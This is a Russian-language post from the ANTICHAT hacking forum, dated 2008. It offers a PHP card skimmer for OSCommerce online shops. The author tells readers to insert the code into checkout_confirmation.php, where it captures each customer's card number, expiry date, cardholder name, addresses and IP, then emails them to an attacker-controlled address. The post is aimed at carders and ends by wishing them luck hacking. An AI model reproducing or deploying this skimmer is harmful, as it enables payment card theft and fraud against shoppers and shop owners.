HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP TROJAN OSCommerce
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

PHP TROJAN OSCommerce
  #1  
Старый 02.11.2008, 20:10
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
С нами: 9765139

Репутация: 177
По умолчанию PHP TROJAN OSCommerce
OSCommerce один из самых популярных движков для онлайн магазинов
в нем есть встоенный модуль для оплаты кредитными картами, который является лакомым куском для хакеров и кардеров
но все чаще встречаются всяческие способы защиты приватных данных, в случае исли злоумышленник все таки получил доступ к базе данных, то остался с носом, вот наглядный пример
номер карты закрыт в середине крестиками

именно для таких случаев я написал небольшой код, который будет перехватывать важную информацию

теперь имея доступ к файлам магазина, необходимо найти файл checkout_confirmation.php (он обычно находится в корневой папке шопа) и в ставить следующий код после открывающего тэга body:
PHP код:
<?
error_reporting (0);
$ip_holder $_SERVER['REMOTE_ADDR'];
$tr_deliv_adr tep_address_format($order->delivery['format_id'], $order->delivery1' '' ');
$tr_bill_adr tep_address_format($order->billing['format_id'], $order->billing1' '' ');
$tr_cc_owner $_POST["cc_owner"];
$tr_cc_number$_POST["cc_number"];
$tr_cc_expires_month $_POST["cc_expires_month"];
$tr_cc_expires_year$_POST["cc_expires_year"];
$info_body "Delivery Address: ";
$info_body .= $tr_deliv_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "Billing Address: ";
$info_body .= $tr_bill_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "IP holder: ".$ip_holder."\n";
$info_body .= "CC holder: ".$tr_cc_owner."\n";
$info_body .= "CC num: ".$tr_cc_number."\n";
$info_body .= "EXP: ".$tr_cc_expires_month."/".$tr_cc_expires_year."\n";
mail("your@mail.com",'!!! NEW CC !!!',$info_body,"onlineshop.com\r\n");
?>
теперь после каждой совершенной оплаты кредитной картой, на ваше мыло your@mail.com будет высылаться вся необходимая информация


P.S. данный код написан под модуль без использования CVV
P.P.S удачи в хеке
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41
Что такое Php? PAPA212 Болталка 13 28.12.2007 20:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.